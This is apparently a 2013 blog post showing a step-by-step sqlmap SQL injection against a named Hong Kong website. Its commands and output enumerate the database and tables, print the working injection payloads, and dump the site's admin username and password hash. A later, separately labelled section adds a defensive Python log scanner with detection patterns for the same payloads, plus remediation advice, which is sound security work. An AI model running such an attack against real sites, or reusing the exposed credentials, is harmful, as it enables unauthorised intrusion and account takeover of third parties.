sqlmap worked example: injecting MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
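Seen from the server side, every one of the four techniques sqlmap reports above (boolean AND n=n, the FLOOR(RAND()) error-based subquery against information_schema, UNION ALL SELECT NULL padding, and SLEEP()) lands in the web server's access log as a non-integer value of the id parameter. The following is an added example, not part of the original post or of sqlmap: a small Python log scanner that decodes each query parameter from Apache-style access log lines and flags requests carrying those signatures, plus any non-integer value in a parameter that the application (like article.php?id=) only ever expects to be an integer. The log lines, the client addresses (192.0.2.x) and the `int_params` list are constructed for the example; the payload strings are the ones sqlmap printed in the session above.

```python
import re
from collections import Counter, namedtuple
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines (placeholder clients 192.0.2.x, not the
# post's target). The id= values are the payloads sqlmap reported in the session
# above, URL-encoded the way they appear on the wire (%20 = space, %23 = '#').
SAMPLE_LOG = """\
192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120
192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799=799 HTTP/1.1" 200 5120
192.0.2.10 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404=8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 310
192.0.2.10 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5200
192.0.2.10 - - [04/Apr/2013:16:53:57 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120
192.0.2.11 - - [04/Apr/2013:16:54:01 +0800] "GET /article.php?id=277 HTTP/1.1" 200 4980
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# One signature per technique sqlmap confirmed against the id parameter.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|information_schema", re.I)),
    ("UNION-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
]

Finding = namedtuple("Finding", "ip param value signatures")


def classify(value):
    """Names of every injection signature present in one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def is_int(value):
    """True for values like '276' or '-8474' that a numeric id parameter should carry."""
    return value.lstrip("-").isdigit()


def analyze_log(text, int_params=("id",)):
    """Parse log lines, decode each query parameter and report those that look injected.

    Parameters listed in int_params are expected to be integers; any non-integer value
    there is reported even when no technique signature matches, which catches variants
    the signature list does not know about.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            sigs = classify(value)
            if param in int_params and not is_int(value):
                sigs.append("non-integer value")
            if sigs:
                findings.append(Finding(m.group("ip"), param, value, sigs))
    return findings


def summarize(text):
    """Flagged requests per client: the count a SOC would alert or rate-limit on."""
    return Counter(f.ip for f in analyze_log(text))


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f.ip, f.param, ", ".join(f.signatures))
    print(dict(summarize(SAMPLE_LOG)))
```

On the constructed sample, the four payload requests from 192.0.2.10 are flagged and the two plain article views are not. Two other points from the session above are worth a defender's attention: sqlmap's "current user: 'root@localhost'" means the PHP application queried MySQL as root, so one injectable integer parameter exposed every table in the instance; a dedicated account with SELECT on the application's own tables only would have limited the blast radius. And the dumped password column is a 32-character varchar holding what sqlmap itself recognized as a password hash, so a leaked row is immediately attackable offline; the fix for the parameter is a prepared statement with id bound as an integer, and the fix for the column is a salted, slow password hash.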